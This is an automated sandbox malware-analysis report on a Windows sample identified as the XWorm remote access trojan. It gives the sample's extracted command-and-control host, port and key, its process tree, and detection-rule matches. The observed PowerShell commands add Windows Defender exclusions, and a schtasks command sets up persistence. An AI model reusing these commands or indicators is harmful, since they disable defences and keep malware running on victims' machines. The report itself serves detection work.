Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
72OWK7wBVH.exe

Overview

General Information

Sample name:72OWK7wBVH.exe
renamed because original name is a hash value
Original sample name:e58e3513066ca537d090cdfae72904220a90ba3b081bbd9d49318e27788c5729.exe
Analysis ID:1575210
MD5:0860112f7bd00567371faffe18061cab
SHA1:84a59bd00070c7bfeb141a2c745c31a6451f7db9
SHA256:e58e3513066ca537d090cdfae72904220a90ba3b081bbd9d49318e27788c5729
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 72OWK7wBVH.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\72OWK7wBVH.exe" MD5: 0860112F7BD00567371FAFFE18061CAB)
    • powershell.exe (PID: 8 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2308 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SYSTEM (PID: 5928 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: 0860112F7BD00567371FAFFE18061CAB)
  • SYSTEM (PID: 5480 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: 0860112F7BD00567371FAFFE18061CAB)
  • SYSTEM (PID: 4556 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: 0860112F7BD00567371FAFFE18061CAB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["if-sensors.gl.at.ply.gg"], "Port": 24891, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
72OWK7wBVH.exeJoeSecurity_XWormYara detected XWormJoe Security
    72OWK7wBVH.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xffa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x10043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x10158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xf77a:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\SYSTEMJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\SYSTEMMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xffa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xf77a:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xfda6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xfe43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xff58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xf57a:$cnc4: POST / HTTP/1.1
        Process Memory Space: 72OWK7wBVH.exe PID: 6776JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.72OWK7wBVH.exe.510000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.72OWK7wBVH.exe.510000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xffa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x10043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x10158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xf77a:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', ProcessId: 8, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', ProcessId: 8, ProcessName: powershell.exe
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\SYSTEM, CommandLine: C:\Users\user\AppData\Roaming\SYSTEM, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\SYSTEM, NewProcessName: C:\Users\user\AppData\Roaming\SYSTEM, OriginalFileName: C:\Users\user\AppData\Roaming\SYSTEM, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\SYSTEM, ProcessId: 5928, ProcessName: SYSTEM
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', ProcessId: 8, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\72OWK7wBVH.exe, ProcessId: 6776, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", ProcessId: 2308, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', ProcessId: 8, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-14T18:55:10.501670+010028559241Malware Command and Control Activity Detected192.168.2.449737147.185.221.2424891TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 72OWK7wBVH.exeAvira: detected
            Antivirus detection for URL or domain
            Source: if-sensors.gl.at.ply.ggAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\SYSTEMAvira: detection malicious, Label: TR/Spy.Gen
            Found malware configuration
            Source: 72OWK7wBVH.exeMalware Configuration Extractor: Xworm {"C2 url": ["if-sensors.gl.at.ply.gg"], "Port": 24891, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\SYSTEMReversingLabs: Detection: 76%
            Multi AV Scanner detection for submitted file
            Source: 72OWK7wBVH.exeReversingLabs: Detection: 76%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\SYSTEMJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: 72OWK7wBVH.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 72OWK7wBVH.exeString decryptor: if-sensors.gl.at.ply.gg
            Source: 72OWK7wBVH.exeString decryptor: 24891
            Source: 72OWK7wBVH.exeString decryptor: <123456789>
            Source: 72OWK7wBVH.exeString decryptor: <Xwormmm>
            Source: 72OWK7wBVH.exeString decryptor: XWorm V5.6
            Source: 72OWK7wBVH.exeString decryptor: USB.exe
            Source: 72OWK7wBVH.exeString decryptor: %AppData%
            Source: 72OWK7wBVH.exeString decryptor: SYSTEM
            Source: 72OWK7wBVH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 72OWK7wBVH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 147.185.221.24:24891
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: if-sensors.gl.at.ply.gg
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 147.185.221.24 ports 1,2,4,24891,8,9
            Source: global trafficTCP traffic: 192.168.2.4:49737 -> 147.185.221.24:24891
            Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: if-sensors.gl.at.ply.gg
            Source: powershell.exe, 00000001.00000002.1779023894.0000020ADC582000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034970056.000002259C890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: powershell.exe, 00000001.00000002.1770585947.0000020AD3FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1861905123.0000014DA0450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2015139866.000002259459F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1753519383.0000020AC41B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D90609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.000002258475A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: 72OWK7wBVH.exe, 00000000.00000002.2942146763.0000000002861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1753519383.0000020AC3F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D903E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.0000022584531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.1753519383.0000020AC41B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D90609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.000002258475A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000B.00000002.2226725098.00000167381D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
            Source: powershell.exe, 00000001.00000002.1779448718.0000020ADC753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: powershell.exe, 00000001.00000002.1753519383.0000020AC3F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D903E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.0000022584531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1770585947.0000020AD3FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1861905123.0000014DA0450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2015139866.000002259459F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Operating System Destruction

            barindex
            Protects its processes via BreakOnTermination flag
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: 01 00 00 00 Jump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 72OWK7wBVH.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.72OWK7wBVH.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeCode function: 0_2_00007FFD9B7F80160_2_00007FFD9B7F8016
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeCode function: 0_2_00007FFD9B7F11900_2_00007FFD9B7F1190
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeCode function: 0_2_00007FFD9B7F8DC20_2_00007FFD9B7F8DC2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C2E111_2_00007FFD9B8C2E11
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F0E7815_2_00007FFD9B7F0E78
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F106815_2_00007FFD9B7F1068
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F0FE215_2_00007FFD9B7F0FE2
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F10D015_2_00007FFD9B7F10D0
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E0E0016_2_00007FFD9B7E0E00
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E106816_2_00007FFD9B7E1068
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E0FE216_2_00007FFD9B7E0FE2
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E10D016_2_00007FFD9B7E10D0
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F0E7818_2_00007FFD9B7F0E78
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F106818_2_00007FFD9B7F1068
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F0FE218_2_00007FFD9B7F0FE2
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F10D018_2_00007FFD9B7F10D0
            Source: 72OWK7wBVH.exe, 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSPOOFER.exe4 vs 72OWK7wBVH.exe
            Source: 72OWK7wBVH.exeBinary or memory string: OriginalFilenameSPOOFER.exe4 vs 72OWK7wBVH.exe
            Source: 72OWK7wBVH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 72OWK7wBVH.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.72OWK7wBVH.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 72OWK7wBVH.exe, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csCryptographic APIs: 'TransformFinalBlock'
            Source: 72OWK7wBVH.exe, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csCryptographic APIs: 'TransformFinalBlock'
            Source: 72OWK7wBVH.exe, 3GqSiOnMczjgnrSizD1bqVUyz5ANfue2d6tIc52d6Q6kfRkXS7pQiPq5sulpXTR3XkYNBnSXSDUCkM7An4EQJVED6GVGo.csCryptographic APIs: 'TransformFinalBlock'
            Source: SYSTEM.0.dr, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csCryptographic APIs: 'TransformFinalBlock'
            Source: SYSTEM.0.dr, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csCryptographic APIs: 'TransformFinalBlock'
            Source: SYSTEM.0.dr, 3GqSiOnMczjgnrSizD1bqVUyz5ANfue2d6tIc52d6Q6kfRkXS7pQiPq5sulpXTR3XkYNBnSXSDUCkM7An4EQJVED6GVGo.csCryptographic APIs: 'TransformFinalBlock'
            Source: 72OWK7wBVH.exe, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 72OWK7wBVH.exe, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: SYSTEM.0.dr, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
